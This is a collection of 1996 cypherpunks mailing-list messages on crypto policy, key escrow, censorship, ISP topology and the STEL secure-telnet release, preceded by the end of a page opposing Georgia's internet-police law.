     $18-billion BellSouth conglomerate is suing for alleged trademark
     infringement. BellSouth holds a trademark on the phrase "The Real
     Yellow Pages," but does that automatically entitle the company to
     "realpages.com" on the Net? Read why a BellSouth triumph could hurt
     you. The boys at realpages.com have put together a nice Web page
     with a yellow background ("we don't think they own the color yellow
     either"). E-mail your support to Don Madey at dmadey@realpages.com.
     Any lawyers out there willing to do pro bono? Publicity from such a
     case could be an excellent career-enhancer.
     
     [IMAGE] c|net News Article on the Police Law.
     
     [IMAGE] Georgia Cyberphobes, the Augusta Chronicle's editorial
     against the Net police bill--written just before Gov. Miller signed
     it. The Chronicle didn't see the HR1630's trademark-related
     language as a threat but objected to the attack on online anonymity.
     It called for Miller to vero the bill.
     
     [IMAGE] Editor and Publisher. He explains how links help
     electronic newspapers. Note: The just-supplied link will soon
     disappear, but when that happens, you might be able to find the
     column in his archives.
     
      Return to Top of Page
      
      [IMAGE]
      
YOUR OWN "NIGHT THE LIGHTS WENT OUT" PARODY? I'M LOOKING FOR THE RIGHT ONE

     
       _______________________________________________________________
     
     
     
     Who can come up with the best "Night the Lights Went Out in
     Georgia" parody-in the spirit of this site?
     
     Give it a shot. May 18 is the contest deadline, and I may extend
     it if Netfolks are too angry to concentrate long enough come up with
     a quotable parody. No prizes, just some exquisite notoriety.
     
     Please do not enter, of course, if you mind having scads of other
     Web sites link to your words.
     
     -David H. Rothman, rothman@clark.net
     
     
       _______________________________________________________________
     
      Top of Page | Return to NetWorld!
      
      [IMAGE]
      
     
     
     Linking Encouraged. No Permission Needed from Me, Especially
     if You're in Georgia!
     
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 May 1996 15:19:28 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <adb3e58a0002100485c4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:05 PM 5/6/96, Duncan Frissell wrote:

>>       However, are you controlling for level of income? The IRS is a lot
>>more worried about TCMay committing tax fraud than they are about me
>>committing
>>tax fraud; my income taxes are a lot closer to 0 than his.
>>       -Allen
>>
>
>Actually, as a percentage of income, tax evasion is probably more prevalent
>among the poor than the rich.  Because they are less exposed.  Studies of
>spending show that the poorest 20% of Americans spend twice their reported
>income.

Indeed, I am extremely limited in how I can avoid complete traceability of
my major income sources. Not rich enough to shelter income in a really big
time way (and even these shelters are harder and harder to
find...near-billionaire Justin Dart renounced his U.S. citizenship and
became a citizen of Belize to avoid huge U.S. taxes). And too rich to
"forget to report" income from mowing lawns, tips, freelance car body
repair, etc.

Caught right in the middle where the computers file reports automatically
with the IRS."You can run, but you can't hide."

By the way, as long as I've added another comment to this not-very-relevant
thread (but one which has generated a lot of comments, so it's hard to hard
folks aren't interested), I should mention that I left out the effects of
INFLATION in my "60%" figure.

To wit, imagine buying an asset (stock, real estate, etc.) for, say,
$10,000 in 1982, selling it for $20,000 in 1995, and having to pay $3600 in
taxes on this "gain," much of which was erased by the effects of inflation.

(I don't have a convenient chart of the cumulative inflation over this
period, but I'd guess it's between 60% and 90%. Meaning, a 1995 dollar is
worth about half to two-thirds of a 1982 dollar.)

Also, the effect of inflation has been to inflate salaries and thus inflate
people into higher tax brackets, even when their "real wages" have not gone
up.

If we ever get really bad inflation again (>10% per year, as we had in the
late 70s, early 90s), or, God forbid, hyper-inflation, the tax system will
likely not survive in anything near its current form.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Busarow <dan@dpcsys.com>
Date: Tue, 7 May 1996 16:07:50 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: misunderstandings of PICS
In-Reply-To: <199605061948.MAA15630@netcom3.netcom.com>
Message-ID: <Pine.SV4.3.91.960506173538.20925B-100000@cedb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 May 1996, Vladimir Z. Nuri wrote:
> but you still don't understand what I stated. the above does not make
> any sense relative to the PICS system. it would be like saying, "we 
> are going to report anyone who doesn't have a SMTP that bans dirty
> email". SMTP does not ban dirty email by definition. PICS does not
> censor material by definition. please read the PICS proposal (sorry the
> URL is not handy, could someone post it?)

The executive summary is at:

  <http://www.w3.org/pub/WWW/PICS/principles.html>

A more complete overview is available at:

  <http://www.w3.org/pub/WWW/PICS/iacwc.htm>

The first, unfortunately, mentions self-rating prominently.  The second
mentions self-rating almost as an aside.  Looks like they needed a bullet
point for the short version.

Dan
-- 
 Dan Busarow
 DPC Systems
 Dana Point, California





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 7 May 1996 14:46:14 +0800
To: cypherpunks@toad.com
Subject: The FBI/NSA's new escrow argument, DC crypto panel
Message-ID: <4lXbBH200YUzQWhWh_@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just came back from the Online Services Industry conference held today
in Washington, DC at the Georgetown Four Seasons. It was very much a DC
thing, organized by Congressmen Jack Fields and Rick White (of the
Internet Caucus).

The fourth panel was "Law Enforcement and Encryption in Cyberspace,"
with this set of characters:

 * Edward Allen, supervisory special agent/section chief, FBI
 * Clinton Brooks, advisor to the director, NSA
 * Dorothy Denning, professor, Georgetown University
 * Bruce Heiman, attorney, Preston Gates Ellis & Rouvelas Meeds
 * Jim Lucier, director of economic research, Americans for Tax Reform
 * Marc Rotenberg, director, EPIC

I was expecting fireworks, or at least a few sparks, but the panel
fizzled. Both sides recounted the same threadbare policy positions we've
heard for years, with one exception: the Administration's new argument
against lifting crypto export controls.

Allen and Brooks claimed that "there needs to be a balanced approach,"
arguing that other nations are relying on the U.S. to maintain export
restrictions to prevent it from falling into the grasping fingers of
overseas terrorists. (And yes, they mentioned child pornographers too.)

The FBI's Allen said: "We have talked to our foreign law enforcement
counterparts who are concerned with exporting strong crypto. Crime is
increasing internationally... There is not an international free market
for crypto. To a great degree, other nations have been relying on U.S.
export controls to maintain stasis. What bothers me about efforts being
proposed legally is that we're moving forward without understanding what
we're getting into... The efforts can go to order or chaos. We're in a
period where it could go to chaos."

Denning recounted the tale of a New York state police bust that seized a
computer with PGP, but no files were encrypted: "They hadn't used it. It
was too much trouble." She said that if PGP is more "integrated," more
criminals will use it. "We need to balance interests and provide for
legitimate law enforcement access. Many businesses are supportive of
this," said Denning.

After Rotenberg and the other half of the panel rebutted, Brock Meeks
asked the first question: Isn't it possible that the government may
eventually ban non-third-party escrowed crypto, in a compromise move?

The FBI's Allen ducked, clumsily. Meeks pressed and Brooks from the NSA
allowed: "Over time, if there are advocates and society says we have to
go further then we may have to."

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 7 May 1996 15:54:30 +0800
To: cypherpunks@toad.com
Subject: Re: UK IP Censorship
In-Reply-To: <199605061552.IAA15075@jobe.shell.portal.com>
Message-ID: <Pine.GUL.3.93.960506175254.5643C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 May 1996 anonymous-remailer@shell.portal.com wrote:

> Financial Times, 6 May 1996
> 
> Internet provider to launch censorship
> 
> By James Mackintosh in London
[...]
> 
> Pipex - the UK arm of UUNet of the US - does not expect a
> backlash from users over the censorship.

Let's see to it that they're wrong.

[ObFUCKING-STATIST: while the article is newbiegarbled, as far as I can
tell, they're only blocking specific newsgroups, and not any IP routes,
which would be worse. IMO, ISPs have the right to block certain
newsgroups, as long as they tell customers what they're doing. HOWEVER, if
Pipex is as big an uber-ISP and news feeder of ISPs as UUNet is here, then
they've clearly gone over the line as far as I'm concerned. I don't care
if AOL blocks alt.sex.kiddie-porn, because the kiddie-porners can simply
move to a real ISP; but the big players have more of an obligation to act
as content-neutral common carriers.]

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 7 May 1996 14:35:09 +0800
To: cypherpunks@toad.com
Subject: Is the network layer geodesic?
In-Reply-To: <01I4A37X6Y0W8Y56P8@mbcl.rutgers.edu>
Message-ID: <v03006614adb4253fff18@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:24 PM  -0400 5/6/96, Scott Brickner wrote:
> The network layer isn't the geodesic Bob H likes to talk about.  That
> doesn't happen until the transport layer (one higher).  It's a
> heirarchical star, with a relatively small number of big ISPs acting as
> the hub, several groups of regional ISPs acting as local arms, and many
> local ISPs acting as the end-points.

Actually, I once lapsed and *did* say the "h" word about the network layer
around here about 6 months ago, and I got slapped severely around the head
and sholders, by Gilmore, if memory serves.

Knowing enough not to argue with my elders and betters, :-), I immediately
recanted and now assert geodecity(!) until proven otherwise.

If I remember right, Gilmore said something about a monstorous
preponderence of packet traffic still being handled by relatively beensy
direct lines...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cert-it@dsi.unimi.it
Date: Tue, 7 May 1996 10:46:28 +0800
To: stel-channels@idea.sec.dsi.unimi.it
Subject: STEL b5 released
Message-ID: <199605061700.TAA25866@idea.sec.dsi.unimi.it>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

STEL beta5 has been released.



1. WHAT IS STEL?

STEL is a free telnet surrogate which provides strong mutual
authentication, encryption, secure file transfer, automatic
s/Key password generation, centralization and management of
s/Key passwords and more.



2. WHERE IS STEL AVAILABLE? 

STEL is available as:

	ftp://idea.sec.dsi.unimi.it/cert-it/stel.tar.gz

Please note that ftp.dsi.unimi.it is not supporting security
stuff anymore.  All the security archive has been moved to
idea.sec.dsi.unimi.it.



3.  WHAT IS THE STATUS OF STEL?

The latest version of STEL is beta 5.
It has been (quite) extensively tested on the following systems:

	hpux sunos4 solaris24 solaris25 irix linux aix

It has been reported to work (but no testing) on:

	ultrix freebsd bsdi

Bug reports, comments and suggestions should be sent to:

	stel-authors@idea.sec.dsi.unimi.it

- --
********************************************************
******** Computer Emergency Response Team ITALY ********
********************************************************

E-mail:		cert-it@idea.dsi.unimi.it
Mailing list:	unix-security-request@idea.sec.dsi.unimi.it
Ftp:		ftp://idea.sec.dsi.unimi.it
WWW:		http://idea.sec.dsi.unimi.it

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3

mQBNAi1eowgAAAECAOTEMFRZHfBb+ndAmdk3vl20EpynEWwB3ZJo/ocZUXgSjBKS
op11p19WyyTV9eW2Sosu9GoC4i7VLDiuFRfmKZUABRG0HkNFUlQtSVQgPGNlcnQt
aXRAZHNpLnVuaW1pLml0PokAVQIFEC1epVbakBlHrAS41wEBnskB/iXnREAs044y
ngOa8uJtYwFaDKc15GUKx9VV2klikcoWKPgaD6WjFs82HmdY86IQL2bFTi8FTKS2
2auGllxW2zaJAJUCBRAtXqV3kbMTtv2Q670BAccAA/sFW+OVkfr8FnClSAlD7fQc
/PL0y8qDF4hYx3tIw1utM5zRGlti+KIOpuUIkQpIX4j8f9lIe/cihL5rlusQFsX4
d7cEJWW8GUM3+/mv89jM0ds6IX9KjfJAQPvPFr5rlRgmHdVm9K4ugCTkOzGsv1E4
o5+ZCN5dJW0+EbmjoghwoA==
=WPYC
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQBVAwUBMY4wESw4rhUX5imVAQFs1gIAuYqr5IAWRoFQzm71sWdBJCOKTCq/G4ti
eucdKJ+5FlmyeQUavWseepozKF019KXElfoHkDVdjl8bnyhFIm7u1w==
=nQd0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 7 May 1996 16:34:32 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: alias servers  (al la alias.c2.org)
Message-ID: <199605062345.SAA03281@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 	How much information do they actually want, and how much do they
> check? I seem to recall that they wanted some info for giving to the
> advertisers and for targeting the advertising.
> 	-Allen
["They (TM)" being Juno, the free email people]

Basic marketing stuff:

(I just abbreviated from their survey, which you can
go back and change at any time :)

Full address, phone numbers optional.  How often do
you use this computer, and for what?  Which of the
following (shopping, bill paying, horoscope, etc...)
would you do online if you could?  Which online
services (AOHell, CI$, MSN, etc. ) have you used/do
you use? What is your profession? What is your income
level?  What about children? Which major appliances/
electronics do you use? What magazines do you read?
What about your free time? What hobbies/other interests
have you? (Optional question: have you traded any
securities in the past twelve months?)

OTOH, there is nothing at all preventing you from completing
all of this with your favorite pseudonym's information; Juno
says that they can't/don't verify all of this, since they just
don't have the resources or the inclination.

Besides, the ads are cute - so far, I've gotten ads for
Welch's grape juice, an Okidata laser printer, Columbia
House record club, and Snapple.  I already buy from three of
those four, so I guess they're preaching to the choir :)

dave

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMY6S1jVTwUKWHSsJAQEcywf+NgrPzFH002OEwtNOoQozidxHN2V8KmlK
+//dLmTz2YkKr1Nrndb1QUHxYYP4n0Bdp0s4Y/GOh30gTKN71WFpa8+wOyEP/kOC
6iaz7KfC9PKBrxWSmpUOeDjnxL3YBzP2LcCvB057gB5Tvrwx6qC9pZ5W6cYnjg9w
77b6EKSP75Seh7jOVDmcEbfSJBOQoTqhjOQhrKHg1uoMvJnojlTGk3HZirr1bDsP
4mISloHVxuJGcg5SDAiOHQu/NG1fRITckV00M9t/YFV3E9BtraJX4AvbBK5zttoJ
2V/ExGvkAVF+VV85tj8OFjms6uzUFzxEQYtlQRz+Ku205uv4A6ZJWg==
=Sj/T
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 7 May 1996 15:42:13 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Police tactics question
In-Reply-To: <01I4E2S0NTES8Y583T@mbcl.rutgers.edu>
Message-ID: <UlXcOpy00YUzIWhZsr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 6-May-96 Police tactics question by
"E. ALLEN SMITH"@ocelot. 
>         I've often heard of the police/postmaster mailing someone child
> pornography prior to going in and busting them for possession of it. What are
> the legal matters in such cases?

According to Bruce "Comstock was an amateur" Taylor, it's only legal for
the Feds to let child porn out of their hands if they can monitor it.
That is, they can let the postman deliver it to you, but they'll lie in
wait and grab you when you tear open the envelope.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: admin@anon.penet.fi
Date: Tue, 7 May 1996 11:12:11 +0800
To: cypherpunks@toad.com
Subject: Anonymous info
Message-ID: <9605061617.AA25267@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested information about your account at anon.penet.fi.

Your code name is: <FAILED@anon.penet.fi>
Your real e-mail address is: <cypherpunks@toad.com: not found>
Your nickname is: <>
Your password is: <>

Regards,

	admin@anon.penet.fi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 7 May 1996 15:36:28 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <01I4DYNHXPW28Y583T@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960506193901.16554A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 May 1996, E. ALLEN SMITH wrote:

> On Sun, 28 Apr 1996, jim bell wrote:
> 
> [...]
> 
> >While strong cryptography is powerful, and secure communications
> >liberating, unplugging the phones would about cripple that 'weapon' for a
> >while.  Any group rebelling based only on high technology communication is
> >an extremely vulnerable group, both to widespread denial of service, and
> >more specific 'surgical' attacks.  (Motorola stock anyone?)

Watch your attributation.  This is my quote.

> 
> 	Wouldn't that partially depend on:
> 		A. the level of backups - packet radio as a backup for phones,
> for instance... a reason I've been forwarding the stuff on radio to here.
> 		B. the necessity to the government of keeping what else may
> depend on those phones - the economy - going.
> 	-Allen
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 7 May 1996 17:38:57 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <01I4DYNHXPW28Y583T@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960506194310.16845A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Sun, 28 Apr 1996, jim bell wrote:
> 
> [...]
> 
> >While strong cryptography is powerful, and secure communications
> >liberating, unplugging the phones would about cripple that 'weapon' for a
> >while.  Any group rebelling based only on high technology communication is
> >an extremely vulnerable group, both to widespread denial of service, and
> >more specific 'surgical' attacks.  (Motorola stock anyone?)

Watch your attributation, this is my quote.

> 
> 	Wouldn't that partially depend on:
> 		A. the level of backups - packet radio as a backup for phones,
> for instance... a reason I've been forwarding the stuff on radio to here.
> 		B. the necessity to the government of keeping what else may
> depend on those phones - the economy - going.
> 	-Allen
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 16:24:46 +0800
To: jimbell@pacifier.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <01I4EBAJKN5W8Y58HH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell"  6-MAY-1996 19:08:19.78

>At 01:44 PM 5/6/96 EDT, E. ALLEN SMITH wrote:

>
>>On Sun, 28 Apr 1996, jim bell wrote:
>>
>>[...]
>>
>>>While strong cryptography is powerful, and secure communications
>>>liberating, unplugging the phones would about cripple that 'weapon' for a
>>>while.  Any group rebelling based only on high technology communication is
>>>an extremely vulnerable group, both to widespread denial of service, and
>>>more specific 'surgical' attacks.  (Motorola stock anyone?)

>The attribution above is in error.  I didn't type those lines above.

	Whoops. Sorry, I believe that was Black Unicorn. My apologies to both
of you.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Tue, 7 May 1996 17:32:33 +0800
To: cypherpunks@toad.com
Subject: Disappearing Cryptography
Message-ID: <199605070248.TAA11302@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


A book by Peter Wayner (pcw@access.digex.com), 
of interest to cypherpunks.
(OK, cypherpunks mailing list subscribers then)

There is more info at Peter's home page:
http://www.access.digex.net/~pcw/pcwpage.html 
but I couldn't get to it when I tried just now.

I got my copy from Border's in Houston on Sunday.

He describes mimic functions, a particular interest of 
mine.  He also covers basic encryption, error correction, 
secret sharing, compression, context free grammers, 
anonymous remailers, reversible computing, etc.

There is an evaluation of several stego packages, and 
an inclusive (there isn't enough published about 
steganography to call it extensive) bibliography.

The presentation is at an introductory, but not trivial 
level.  I wish there had been more technical explanations, 
but I suppose the author would have lost a sizable fraction 
of an already tiny audience.  

By the way, "the people who participate on the cypherpunks 
mailing list" get a nice "thankyou" in the preface.

Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ncr.com>
Date: Tue, 7 May 1996 16:28:53 +0800
To: stel-channels@idea.sec.dsi.unimi.it
Subject: STEL b5 released
Message-ID: <2.2.32.19960506235221.006606b4@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a FYI :)

From: cert-it@dsi.unimi.it

-----BEGIN PGP SIGNED MESSAGE-----

STEL beta5 has been released.



1. WHAT IS STEL?

STEL is a free telnet surrogate which provides strong mutual
authentication, encryption, secure file transfer, automatic
s/Key password generation, centralization and management of
s/Key passwords and more.



2. WHERE IS STEL AVAILABLE? 

STEL is available as:

	ftp://idea.sec.dsi.unimi.it/cert-it/stel.tar.gz

Please note that ftp.dsi.unimi.it is not supporting security
stuff anymore.  All the security archive has been moved to
idea.sec.dsi.unimi.it.



3.  WHAT IS THE STATUS OF STEL?

The latest version of STEL is beta 5.
It has been (quite) extensively tested on the following systems:

	hpux sunos4 solaris24 solaris25 irix linux aix

It has been reported to work (but no testing) on:

	ultrix freebsd bsdi

Bug reports, comments and suggestions should be sent to:

	stel-authors@idea.sec.dsi.unimi.it

- --
********************************************************
******** Computer Emergency Response Team ITALY ********
********************************************************

E-mail:		cert-it@idea.dsi.unimi.it
Mailing list:	unix-security-request@idea.sec.dsi.unimi.it
Ftp:		ftp://idea.sec.dsi.unimi.it
WWW:		http://idea.sec.dsi.unimi.it

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3

mQBNAi1eowgAAAECAOTEMFRZHfBb+ndAmdk3vl20EpynEWwB3ZJo/ocZUXgSjBKS
op11p19WyyTV9eW2Sosu9GoC4i7VLDiuFRfmKZUABRG0HkNFUlQtSVQgPGNlcnQt
aXRAZHNpLnVuaW1pLml0PokAVQIFEC1epVbakBlHrAS41wEBnskB/iXnREAs044y
ngOa8uJtYwFaDKc15GUKx9VV2klikcoWKPgaD6WjFs82HmdY86IQL2bFTi8FTKS2
2auGllxW2zaJAJUCBRAtXqV3kbMTtv2Q670BAccAA/sFW+OVkfr8FnClSAlD7fQc
/PL0y8qDF4hYx3tIw1utM5zRGlti+KIOpuUIkQpIX4j8f9lIe/cihL5rlusQFsX4
d7cEJWW8GUM3+/mv89jM0ds6IX9KjfJAQPvPFr5rlRgmHdVm9K4ugCTkOzGsv1E4
o5+ZCN5dJW0+EbmjoghwoA==
=WPYC
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQBVAwUBMY4wESw4rhUX5imVAQFs1gIAuYqr5IAWRoFQzm71sWdBJCOKTCq/G4ti
eucdKJ+5FlmyeQUavWseepozKF019KXElfoHkDVdjl8bnyhFIm7u1w==
=nQd0
-----END PGP SIGNATURE-----
                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
Dreams.  They're just screen savers for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Tue, 7 May 1996 16:27:45 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Is the network layer geodesic?
Message-ID: <v02140b04adb46889ffaf@[17.255.9.110]>
MIME-Version: 1.0
Content-Type: text/plain


The principle problem is that public exchange points do not scale beyond
current LAN technology (i.e. half-duplex 100 Mb/s FDDI or Ethernet), and
how many DS3 (T3; 45Mb/s full-duplex!) pipes does it take to fill that up?
Two.

Now, drop a DEC GIGAswitch in there (16 FDDI ports, 3.2Gb/s backplane), and
now you can have sixteen peers on the exchange. Last count I saw, there are
1,800 ISPs operating in the USA alone, and *everyone* want to be at the
exchange points. Oops. How many exchange points are there? Well:

NSF Network Access Points (NAPs): New York (well, Pennsauken, NJ; Sprint),
Chicago (Ameritech), San Francisco (Pac*Bell)
MAE-EAST (D.C.), MAE-WEST (Mountain View-San Jose), MAE-LA, CIX (San Jose)
FIX-EAST (D.C.), FIX-WEST (Mountain View; just for the Feds)
SWAB (D.C., but almost no one left there).

There are probably a few new ones that are forming that I am unaware of as
yet, but the point is that they're small-fry. There are also probably
exchange points outside the USA, but I bet they're being held up with PTT
B.S.

The Internet is amorphous. It ain't a star, exactly, but it still not too
far from that. However, to get away from this situation into the rich and
more fully amorphous connectivity we used to take for granted in the UUCP
network, we're going to have to see a lot more cooperation on the part of
the small ISPs in agreeing to talk *directly* to each other to exchange
traffic, and more small exchange points, instead of the small number of
large ones.

Of course, this means that you, Mr. or Ms. Discriminating Internet
Consumer, must educate yourself a little, and ask interesting questions
like, "why do my packets have to go to California to get across town to the
ISP my friend uses?" If the customers ask, the ISPs will serve. They just
gotta know what you want (and you have to be willing, of course, to pay for
it).

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Tue, 7 May 1996 16:06:54 +0800
To: cypherpunks@toad.com
Subject: Escrowing signing vs. encryption keys
Message-ID: <01I4EDQIJ1MA9C1W4G@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Date: 05/06/96 06:55 pm ##
  Subject: Escrowing signing vs. encryption keys. ]

>Date: Thu, 25 Apr 1996 21:06:37 -0700
>From: Hal <hfinney@shell.portal.com>
>Subject: Re:  US law - World Law - Secret Banking

>Baker's problem was that the keys would be used for signing as well
>as for encryption.  He said that in the U.S. they had been careful
>to separate these functions in their plans.  That's why we have DSS
>for signatures and Clipper (Capstone, Skipjack, etc.) for
>encryption.  Only the Clipper keys get escrowed.  The DSS keys are
>kept private.

>Privacy, on the other hand, at least from the point of view of
>someone like Baker, is not as important.  His people eavesdropped
>all the time, and it wasn't that bad.  So from his perspective it is
>reasonable that a possibly insecure escrow system is acceptable for
>encryption, but not for signatures.  And that is apparently a
>principle behind the US crypto policies as they have unfolded over
>the last few years.

There is another angle to this.  If extralegal key escrow accesses
are occurring, it will probably take a long time to come out, if it
ever does.  There's a good chance that anyone successfully
eavesdropping on people by use of the key escrow mechanism will
simply keep quiet about it, and while the victim may *suspect*
what's happened, they won't be able to prove it.  However, forged
signatures *will* be noticed directly, and there will be
high-profile court cases about them.  Even if untrue, serious
allegations of forged signatures based on escrowed signing keys will
make it into the papers, and cause all kinds of chaos.  Presumably,
this is seen by the Feds to balance out the downside that, if I have
the ability to do secure signatures with certificates, I can always
use Diffie-Hellman to establish a secure session with someone else.

>Hal

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMY6Vh0Hx57Ag8goBAQHI2gP/bUhtWnIjWX8xKJ44IcmdG9OqbO7PaB1B
9iu7GYFzQXLgsMdc9Opzm64W7F+NrBlE1PjOCj965bK7MC9+Lz176Bo5nBHGMktP
pALZcRvm6bmNMls49abvucVr8Xm2SbDOnsp5z4NHVUuNGdXi+J5tDVR2vYqIQjh5
GmZk9fVkQUM=
=r6zZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 7 May 1996 17:20:08 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: More on Internet connections
Message-ID: <m0uGe6f-00097IC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>From:	IN%"rre@weber.ucsd.edu"  6-MAY-1996 01:36:44.84
>From: Phil Agre <pagre@weber.ucsd.edu>
                
>                      "THE FIRST 100 FEET"
>            OPTIONS FOR INTERNET AND BROADBAND ACCESS
    
>     This conference looks at options for Internet and broadband
>access from the perspective of home owners, apartment complexes,
>and small businesses.  It will evaluate opportunities and
>obstacles for "bottom-up" infrastructure development and the
>implications for traditional and alternative providers at the
>neighborhood, regional, and national levels.  We are seeking
>original analysis, position papers, and background material for
>use in the conference program, on the project website, and in a
>book to be published in early 1997.
>     
>     The conference challenges business and policymakers to
>rethink fundamental issues in telecommunications policy by
>recasting the "problem of the last 100 feet" as "opportunities
>for the first 100 feet."  This paradigm shift suggests
>consumer/property owner investment as an answer to the dilemma of
>whether there should be one or two wires into the home. 


I'm glad to see that somebody's addressing this issue.  It seems to me that 
